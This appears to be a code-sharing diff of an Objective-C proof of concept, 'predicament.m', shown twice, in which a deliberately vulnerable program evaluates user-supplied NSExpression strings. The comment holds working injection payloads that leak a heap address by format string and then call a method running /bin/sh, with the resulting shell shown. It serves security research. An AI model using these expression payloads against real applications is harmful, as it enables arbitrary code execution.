aemmitt-ns · April 9, 2022 03:20
diff --git a/predicament.m b/predicament.m
 #import <Foundation/Foundation.h>

 /*
 [~/predicament]$ gcc -framework Foundation -lobjc -o predicament predicament.m 
 [~/predicament]$ ./predicament "function('','stringByAppendingFormat:','%lld     ').longLongValue"                   
 Expr: 'FUNCTION("", "stringByAppendingFormat:" , "%lld     ").longLongValue' (type: 4)

 Value:  105553129238592
 Danger: 105553129237664 (offset 928)
 [~/predicament]$ ./predicament "function(function('','stringByAppendingFormat:','%lld     ').longLongValue-928,'longValue').dangerous"
 Expr: 'FUNCTION(FUNCTION("", "stringByAppendingFormat:" , "%lld     ").longLongValue - 928, "longValue").dangerous' (type: 4)

 sh-3.2$ ls
 predicament     predicament.m
 sh-3.2$
 */

 @interface Danger:NSObject {
   double length;    
   double breadth;  
   double height;   
 }
 @end

 @implementation Danger
 -(id)init {
  self = [super init];
  return self;
 }
 -(NSString *) description {
  return @"lol";
 }
 -(void) dangerous {
  system("/bin/sh");
 }
 @end

 int main(int argc, char *argv[]) {
  if (argc != 2) {
    printf("usage: %s predicate\n", argv[0]);
    exit(1);
  }

  @autoreleasepool {
    NSString *content = [NSString stringWithUTF8String:argv[1]];
    NSMutableDictionary *context = [NSMutableDictionary dictionary];
    Danger *danger = [Danger new];

    NSExpression *expr = [NSExpression expressionWithFormat:content];
    printf("Expr: '%s' (type: %lu)\n\n", expr.description.UTF8String, 
      (unsigned long)expr.expressionType);
      
    NSNumber *value = [expr expressionValueWithObject:nil context:context];
    long long offset = value.longLongValue-(long long)danger;
    printf("Value:  %s\n", value.description.UTF8String);
    printf("Danger: %lld (offset %lld)\n", (long long)danger, offset);
  }

  return 0;
 }
	#import <Foundation/Foundation.h>

	/*
	[~/predicament]$ gcc -framework Foundation -lobjc -o predicament predicament.m
	[~/predicament]$ ./predicament "function('','stringByAppendingFormat:','%lld ').longLongValue"
	Expr: 'FUNCTION("", "stringByAppendingFormat:" , "%lld ").longLongValue' (type: 4)

	Value: 105553129238592
	Danger: 105553129237664 (offset 928)
	[~/predicament]$ ./predicament "function(function('','stringByAppendingFormat:','%lld ').longLongValue-928,'longValue').dangerous"
	Expr: 'FUNCTION(FUNCTION("", "stringByAppendingFormat:" , "%lld ").longLongValue - 928, "longValue").dangerous' (type: 4)

	sh-3.2$ ls
	predicament predicament.m
	sh-3.2$
	*/

	@interface Danger:NSObject {
	double length;
	double breadth;
	double height;
	}
	@end

	@implementation Danger
	-(id)init {
	self = [super init];
	return self;
	}
	-(NSString *) description {
	return @"lol";
	}
	-(void) dangerous {
	system("/bin/sh");
	}
	@end

	int main(int argc, char *argv[]) {
	if (argc != 2) {
	printf("usage: %s predicate\n", argv[0]);
	exit(1);
	}

	@autoreleasepool {
	NSString *content = [NSString stringWithUTF8String:argv[1]];
	NSMutableDictionary *context = [NSMutableDictionary dictionary];
	Danger *danger = [Danger new];

	NSExpression *expr = [NSExpression expressionWithFormat:content];
	printf("Expr: '%s' (type: %lu)\n\n", expr.description.UTF8String,
	(unsigned long)expr.expressionType);

	NSNumber *value = [expr expressionValueWithObject:nil context:context];
	long long offset = value.longLongValue-(long long)danger;
	printf("Value: %s\n", value.description.UTF8String);
	printf("Danger: %lld (offset %lld)\n", (long long)danger, offset);
	}

	return 0;
	}